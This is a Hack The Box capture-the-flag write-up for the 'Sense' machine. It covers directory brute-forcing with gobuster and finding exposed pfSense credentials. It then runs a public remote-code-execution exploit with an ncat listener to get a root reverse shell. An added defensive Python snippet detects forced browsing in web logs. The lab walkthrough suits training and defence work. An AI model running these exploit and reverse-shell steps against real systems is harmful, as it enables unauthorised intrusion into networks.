Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.
In this series of articles we will show how junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that is required for many top cybersecurity positions. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.
Let's start with the fun!
Sense
Initial Foothold
Port 80 redirects us to port 443, which holds a pfSense login.
Fuck this machine, you have to enumerate the webpage using the medium dirbuster wordlist and search for txt extensions:
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -o gobuster/gobuster_txt.txt -x txt -t 50
With that, we find system-users.txt, which says:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
The actual credentials are: rohit:pfsense.
From the gobuster bruteforce, we also find changelog.txt, which says there is an unpatched vulnerability.
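Seen from the defender's side, the gobuster run above is a burst of 404s from a single client with a few successful requests in between. The following added example (not part of the original write-up) flags such a client in a web access log and lists what it managed to retrieve. The combined-style log format, the thresholds, the function names and the client addresses are assumptions, and the log itself is constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumption: combined-log-style access lines; adapt the regex to your server.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def detect_forced_browsing(lines, window_s=10, min_404=20):
    """Map each flagged client IP to the paths it fetched successfully."""
    recent = defaultdict(deque)   # ip -> (timestamp, path) of recent 404s
    hits = defaultdict(set)       # ip -> paths answered with status < 400
    flagged = set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # not an access record
        ip, path, status = m["ip"], m["path"], int(m["status"])
        ts = datetime.strptime(m["ts"], TS_FMT)
        if status < 400:
            hits[ip].add(path)
        elif status == 404:
            q = recent[ip]
            q.append((ts, path))
            while (ts - q[0][0]).total_seconds() > window_s:
                q.popleft()
            if len({p for _, p in q}) >= min_404:   # burst of distinct misses
                flagged.add(ip)
    return {ip: sorted(hits[ip]) for ip in flagged}


def sample_log():
    """Constructed log: one enumerating client, one ordinary browser."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    def row(ip, ms, path, status):
        ts = (t0 + timedelta(milliseconds=ms)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512 "-" "-"'
    out = [row("192.0.2.10", 0, "/index.php", 200),
           row("192.0.2.10", 500, "/favicon.ico", 404)]
    out += [row("198.51.100.7", 20 * i, f"/word{i}.txt", 404) for i in range(60)]
    out += [row("198.51.100.7", 1300, p, 200)
            for p in ("/system-users.txt", "/changelog.txt")]
    return out

if __name__ == "__main__":
    print(detect_forced_browsing(sample_log()))
```

Any path in the result is a file the enumerating client actually read, so each one should be reviewed for content that does not belong in the web root.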
Root
Upon login, we see the version for pfSense: 2.1.3.
Running searchsploit pfsense, we find an exploit with remote code execution for versions < 2.1.4.
- Mirror it: searchsploit -m 43560.py
- Rename it: mv 43560.py exploit.py
- Set up a listener: ncat -lnvp 12345
- Fire the exploit: python3 exploit.py --rhost 10.10.10.60 --lhost 10.10.14.31 --lport 12345 --username rohit --password pfsense
- We get a root shell.